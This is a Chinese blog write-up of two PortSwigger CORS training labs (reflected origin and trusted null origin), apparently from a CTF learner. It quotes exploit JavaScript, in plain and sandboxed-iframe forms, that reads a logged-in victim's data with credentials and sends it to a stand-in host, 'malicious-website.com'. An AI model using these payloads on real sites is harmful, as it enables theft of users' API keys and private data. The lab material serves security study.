portswigger CORS

最新推荐文章于 2024-01-11 11:35:16 发布
最新推荐文章于 2024-01-11 11:35:16 发布
阅读量576 收藏 3
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53755216/article/details/118964156
版权

写在前面

最近忙于复现比赛 今天来学点新知识
昨天做ctfshow的 cms 时 了解到了 有 Flash 的一个洞 和 cors 有关
今天来深入学习一下和cors有关的知识

start

什么是CORS?

跨域资源共享 (CORS) 是一种浏览器机制,可以对位于给定域之外的资源进行受控访问。它扩展并增加了同源策略 ( SOP ) 的灵活性。但是,如果网站的 CORS 策略配置和实施不当,它也会为基于跨域的攻击提供可能性。CORS 不是针对跨站请求伪造(CSRF)等跨源攻击的保护措施。

Same-origin policy(SOP)

同源策略是一种限制性的跨域规范,它限制了网站与源域之外的资源进行交互的能力。同源策略是多年前定义的,以应对潜在的恶意跨域交互,例如一个网站从另一个网站窃取私人数据。它通常允许一个域向其他域发出请求,但不允许访问响应。

提到这个同源 我就想到了以前写java 时 解决跨域时的痛苦debug经历

给了以下脚本来检索

var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://vulnerable-website.com/sensitive-victim-data',true);
req.withCredentials = true;
req.send();

function reqListener() {
location='//malicious-website.com/log?key='+this.responseText;
};

大致明白了 CORS 攻击的原理
首先 要找到类似于 XSS 的漏洞
比如这题 在插入脚本后 可得到 api 密钥

第一题 CORS vulnerability with basic origin reflection

题目要求

该网站具有不安全的CORS配置,因为它信任所有来源。

为了解决这个实验,制作一些 JavaScript,使用 CORS 来检索管理员的 API
密钥并将代码上传到您的漏洞利用服务器。当您成功提交管理员的 API 密钥时,实验室就解决了。

您可以使用以下凭据登录自己的帐户: wiener:peter

突然发现我连扫描时API 密钥都不知道 。。。

我们登陆时请求 /accountDetails 会返回

HTTP/1.1 200 OK
Access-Control-Allow-Credentials: true               //重要 表明可能支持CORS
Content-Type: application/json; charset=utf-8
X-XSS-Protection: 0
Connection: close
Content-Length: 149

{
  "username": "wiener",
  "email": "",
  "apikey": "4nZaUJ6Lx5iFLNNkT6WqKPbUhk3sggK5",
  "sessions": [
    "SQTSU53Uc6CmUuIFOXRtuLK6D5ktxblU"
  ]
}

现在思考一个问题 在这里的 apikey 的作用是什么?
有什么利用方式嘛 。。。(这个问题先留着)

看到可以更新邮箱 猜测拿到 apikey 后可以更新邮箱??
抓个包看一下

POST /my-account/change-email HTTP/1.1
Host: target-ac4f1f931f1056d680a7448700d9005f.web-security-academy.net
Cookie: session=SQTSU53Uc6CmUuIFOXRtuLK6D5ktxblU
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
Origin: https://target-ac4f1f931f1056d680a7448700d9005f.web-security-academy.net
Referer: https://target-ac4f1f931f1056d680a7448700d9005f.web-security-academy.net/my-account
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

email=dgsadfg%4011.com&csrf=lUQDlYV1q62F1Ue4fzXt3h3bDd4RXXUn

貌似改邮箱并用不到 apikey ??

emmm 那就找题目说的去拿吧 把刚才文章里的payload拿来改一下
放到攻击服务器里 可得到管理员的 apikey

CORS第二题 CORS vulnerability with trusted null origin

为什么感觉跟上题没啥区别
访问 /accoutDetails

怎么感觉和上题没啥区别???

HTTP/1.1 200 OK
Access-Control-Allow-Credentials: true
Content-Type: application/json; charset=utf-8
X-XSS-Protection: 0
Connection: close
Content-Length: 149

{
  "username": "wiener",
  "email": "",
  "apikey": "eWGLUPc3TbDhdrNpaW9Ido6vYYbvObHf",
  "sessions": [
    "0b93NqhXQnM3dsrVM0RVZYAin1n7Wn06"
  ]
}

Whitelisted null origin value

需要利用新的知识点

Browsers might send the value null in the Origin header in various unusual situations:

Cross-site redirects.
Requests from serialized data.
Request using the file: protocol.
Sandboxed cross-origin requests.

如果一个应用程序收到一下请求

GET /sensitive-victim-data
Host: vulnerable-website.com
Origin: null

而服务器响应

HTTP/1.1 200 OK
Access-Control-Allow-Origin: null
Access-Control-Allow-Credentials: true

在这种情况下,攻击者可以使用各种技巧来生成一个在 Origin 头中包含 null 值的跨域请求. 其可以满足白名单, 导致跨域请求. 例如,可以利用iframe 跨域请求来过沙盒(如以下形式):
payload

<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src="data:text/html,<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','vulnerable-website.com/sensitive-victim-data',true);
req.withCredentials = true;
req.send();

function reqListener() {
location='malicious-website.com/log?key='+this.responseText;
};
</script>"></iframe>

回到题目 我们发送一个请求如下

GET /accountDetails HTTP/1.1
Origin:null

返回

HTTP/1.1 200 OK
Access-Control-Allow-Origin: null
Access-Control-Allow-Credentials: true

满足攻击需求 可以直接攻击

参考文章

https://portswigger.net/research/exploiting-cors-misconfigurations-for-bitcoins-and-bounties
https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/

b1ue0cean
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CORS跨域
weixin_46078854的博客
11-12 1518
一、修改代码: 1.简单请求 //go后端(w为http.ResponseWriter): w.Header().Set("Access-Control-Allow-Origin", “*”); 2.非简单请求(预检) //go后端(w为http.ResponseWriter): // 如果需要http请求中带上cookie,需要前后端都设置credentials,且后端设置指定的origin,即域名不能为"*" w.Header().Set("A......
CORS漏洞利用检测和利用方式
weixin_30245867的博客
07-21 5805
  CORS全称Cross-Origin Resource Sharing, 跨域资源共享,是HTML5的一个新特性,已被所有浏览器支持,不同于古老的jsonp只能get请求。 检测方式:   1.curl访问网站     curl https://www.huasec.com -H "Origin: https://test.com" -I   检查返回包的 Access-C...
跨域资源共享 (CORS) | PortSwigger(burpsuite官方靶场)【万字】
bin789456的博客
08-21 674
写在前面 在开始之前,先要看看ajax的局限性和其他跨域资源共享的方式,这里简单说说。 下面提到大量的origin,注意区分referer,origin只说明请求发出的域。 浏览器的同源组策略:如果两个 URL 的 protocol、port 和 host 都相同的话,则这两个 URL 是同源。同源策略是一个重要的安全策略,它用于限制一个origin的文档或者它加载的脚本如何能与另一个源的资源进行交互。它能帮助阻隔恶意文档,减少可能被攻击的媒介。最重要的是它通常允许域向其他域发出请求,但不允许访问响应。 a
CORS Attack(Cross-origin Resource Sharing Attack) 跨域资源共享攻击
Eason_LYC安全白帽子的成长博客
05-13 3774
CORS攻击,详细梳理总结,全网少见,并有靶场配套练习。
CORS-vulnerable-Lab:样本易受攻击的代码及其利用代码
05-05
CORS配置错误易受攻击的实验室 该存储库包含与CORS错误配置相关的易受攻击的代码。 可以在本地计算机上配置易受攻击的代码,以实际利用CORS相关的错误配置问题。 我想对@albinowax(感谢他在CORS开发中的工作),AKReddy和Vivek Sir(感谢始终支持我的杰出人物)和Andrew Sir-@vanderaj(感谢他的鼓励之词)表示感谢 在计算机上设置实验室 以下是在本地/远程计算机上配置易受攻击的代码的先决条件 Apache Web服务器 PHP 5/7 MySQL数据库 配置步骤: 下载并提取Web服务器“ htdocs”或webroot目录中的代码。 打开PHPMyAdmin并创建名称为“ ica_lab”的新数据库。 如果要使用MySQL“ root”用户帐户,请跳过下面提到的步骤,然后跳到步骤no。 5, 通过执行以下提到SQL命令来创建一个名为“
CROS跨域漏洞复现分析
最新发布
Soda_199的博客
01-11 496
以实例展现CROS跨域问题的危害
Lab: Method-based access control can be circumvented:绕过基于方法的访问控制
Zeker62的博客
08-24 256
靶场内容 本实验部分基于请求的 HTTP 方法实现访问控制。您可以通过使用凭据登录来熟悉管理面板administrator:admin。 要解决实验室问题,请使用凭据登录wiener:peter并利用有缺陷的访问控制将自己提升为管理员。 漏洞解析 使用管理员账号登录控制面板 将carlos提权,并截获数据包到repeater 打开新的窗口,这窗口里面登录wiener的账号 将wiener账号的...
portswigger证书
11-19
portswigger证书,der格式、pem格式,转化好的,直接可以用哦! Android设备抓包必备哦!
burpsuitezhengshu
02-04
burpsuite safty credenticate service,...................................................................................................
buby:PortSwigger Burp Suite 的 BurpExtender 接口的 JRuby 实现
06-08
说明: Buby 是 JRuby 与 PortSwigger 流行的商业 Web 安全测试工具 Burp Suite 的混搭。 Burp 由使用 BurpExtender API 的 Java 扩展或使用新的嵌入式 JRuby 支持的 JRuby BurpExtender 实现驱动并绑定到 JRuby。 ...
swurg:将OpenAPI文档解析到Burp Suite中以自动执行基于OpenAPI的API安全评估(PortSwigger批准将其包含在其官方BApp Store中)
02-03
Swurg是Burp Suite扩展,专门用于OpenAPI测试。 OpenAPI规范(OAS)为REST API定义了标准的,与编程语言无关的接口描述,使人和计算机都可以发现和理解服务的功能,而无需访问源代码,附加文档或检查网络流量。...
googleauthenticator:Burp Suite插件,可动态生成用于会话处理规则的Google 2FA代码(由PortSwigger批准,可包含在其官方BApp Store中)
02-03
GoogleAuthenticator Burp Suite扩展程序,用于将当前的Google两因素身份验证(2FA)代码应用于相关请求。 这个Burp Suite扩展程序将Burp变成了Google Authenticator客户端。 当前的Google 2FA代码会自动应用于相关...
【burpsuite安全练兵场-客户端13】跨来源资源共享(CORS)-4个实验(全)
01-16 8555
【BP靶场portswigger-客户端13-跨来源资源共享(CORS)】4个实验-万文步骤
检测到目标url存在http host头攻击漏洞_原创干货 | 认识CORS漏洞
weixin_39777540的博客
12-15 600
点击上方蓝色字关注我们~前 言CORS漏洞其中已经存在很久了,但是国内了解的人不是很多,文章更是少只有少,漏洞平台也没有此分类。在DefConChina中,陈建军分享的议题中解释的更清楚,有意向的可以找PPT或者视频owasp内的详细介绍http://blog.securelayer7.net/owasp-top-10-security-misconfiguration-5-cors-v...
Cors跨域请求,配置Access-Control-Allow-Origin:"*",无效解决方案
热门推荐
倒着走的码农
03-17 3万+
由于应用需要跨域请求数据,博主在JDK8、Tomcat7.0的cors可以配置Access-Control-Allow-Origin:"*",但是我按照文档配置以后却没有生效,一度怀疑是tomcat或者jdk的问题,最后想起来web.xml是按照从前往后的顺序加载的。解决方案:是filter位置的问题,你把整个放到第一个filter的位置就可以了。给出web.xml: <web-app
Swagger(一) Swagger/Springfox 入门简介
奥迪的博客
09-12 7339
Swagger/Springfox 入门简介 一、 Swagger 简介 1 前言 接口文档对于前后端开发人员都十分重要。尤其近几年流行前后端分离后接口文档又变成重中之重。接口文档固然重要,但是由于项目周期等原因后端人员经常出现无法及时更新,导致前端人员抱怨接口文档和实际情况不一致。 很多人员会抱怨别人写的接口文档不规范,不及时更新。当时当自己写的时候确实最烦去写接口文档。这种痛苦只有亲身经历才会牢记于心。 如果接口文档可以实时动态生成就不会出现上面问题。 Swagger 可以完美的解决上面..
BurpSuite之检测CORS方便化
https://www.cnblogs.com/zpchcbd/
07-28 2978
哈哈 标题够中二够沙雕果然会有人来看 分享下burpsuite挖掘cors的技巧哈!!! CORS的漏洞主要看当我们发起的请求中带有Origin头部字段时,服务器的返回包带有CORS的相关字段并且允许Origin的域访问。 但是问题来了 我们每次检测CORS都需要手动的加上去那不会太麻烦吗(emm 除非你用工具批量检测哈 当我没说) 这里有个方法推荐给大家。 首先是自动在HTTP请求包中加上O...
CORS误配置高级利用技巧两例
公众号shadow sock7
05-17 573
原文:https://medium.com/@sandh0t/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397 参考:https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties ht...
PortSwigger网络安全学院学习路径
周无争的博客
09-26 843
以下是如何充分利用网络安全学院的方法 如果你是网络安全新手,可能很难知道从哪里开始。这就是为什么我们给出这条建议的学习路径,为你指明正确的方向。我们建议你按顺序完成实验,但是如果遇到困难,那就继续下一个主题。一旦你增长了技能,你可以再回来解决这些有挑战的实验。 当你开始培养你的网络安全测试技能时,你可以尝试考取我们的BurpSuite从业者认证来测试自己的技能。在你准备尝试BurpSuite从业者认证考试之前,你应该能够轻松完成网络安全学院中所有标有Practitio...
portswigger Authentication
07-28
PortSwigger是一家网络安全公司,他们开发了一款名为Burp Suite的强大的网络安全测试工具。在Burp Suite中,有一个功能模块是用于进行身份验证测试的,即Authentication模块。这个模块可以帮助安全专业人员测试应用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值